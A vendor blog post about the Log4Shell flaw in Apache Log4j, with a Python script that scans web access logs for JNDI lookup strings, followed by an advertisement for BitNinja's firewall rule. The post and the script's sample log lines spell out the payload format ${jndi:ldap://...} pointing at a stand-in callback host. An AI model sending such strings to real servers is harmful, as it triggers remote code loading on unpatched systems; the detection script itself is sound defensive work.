
Akos Molnar | 2021.12.15. |

Log4j Log4Shell Zero-day Vulnerability is Patched by BitNinja

On the 10th of December, bleepingcomputer.com reported an exploit for a critical zero-day vulnerability called “Log4Shell”. The vulnerability affects Apache Log4j, a Java-based logging platform used to access web server and application logs.

About the vulnerability

To exploit this vulnerability, an attacker could set the user agent of a web browser to a string in the format ${jndi:ldap://[attacker_URL]} and access the website, or search the website for a string in that format. Either way, the string is added to the web server’s access log.

If the Log4j application parses these logs and finds the string, the bug forces the server to make a callback or request to the URL listed in the JNDI string. An attacker could use this URL to pass Base64-encoded commands or Java classes to execute on a vulnerable device.
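
As an added example (not part of the original post and not BitNinja's WAF rule), the following Python script scans access-log lines for the lookup string format described above, including the percent-encoded form a search query takes in the log. The Combined Log Format layout, the regular expressions and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumed layout: Combined Log Format
# ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The lookup format from the article: ${jndi:ldap://[attacker_URL]}
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^}/\s]+)', re.IGNORECASE)

def decode(value, rounds=3):
    """Undo percent-encoding a bounded number of times (search terms are logged encoded)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (client_ip, field, scheme, callback_host) hits for one log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    hits = []
    for field in ("request", "referer", "agent"):
        hit = JNDI_RE.search(decode(m.group(field)))
        if hit:
            hits.append((m.group("ip"), field, hit.group("scheme").lower(), hit.group("target")))
    return hits

def scan(lines):
    """Scan many log lines and return all hits in order."""
    return [hit for line in lines for hit in scan_line(line)]

# Constructed sample lines (documentation IP ranges, example domain).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"',
    '198.51.100.23 - - [10/Dec/2021:09:15:40 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Dec/2021:09:16:11 +0000] "GET /search?q=log4j+patch HTTP/1.1" 200 901 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, field, scheme, target in scan(SAMPLE_LOG):
        print(f"{ip}: JNDI lookup string in {field} -> {scheme}://{target}")
```

A hit shows that a request carrying the string reached the server, not that Log4j processed it; the callback host it reports is what to look for in outbound connection logs.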

Solution by BitNinja

The Ninjas found the solution quickly and created a WAF rule (Rule ID: 407002-407003) to defend your servers against the Log4j Log4Shell zero-day vulnerability. You don’t have to do anything; just sit back and relax.


Zero-day vulnerabilities are one of the most dangerous threats out there. Cybersecurity is not optional anymore. It is a must!

If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card needed!


Let’s make the Internet a safer place together!
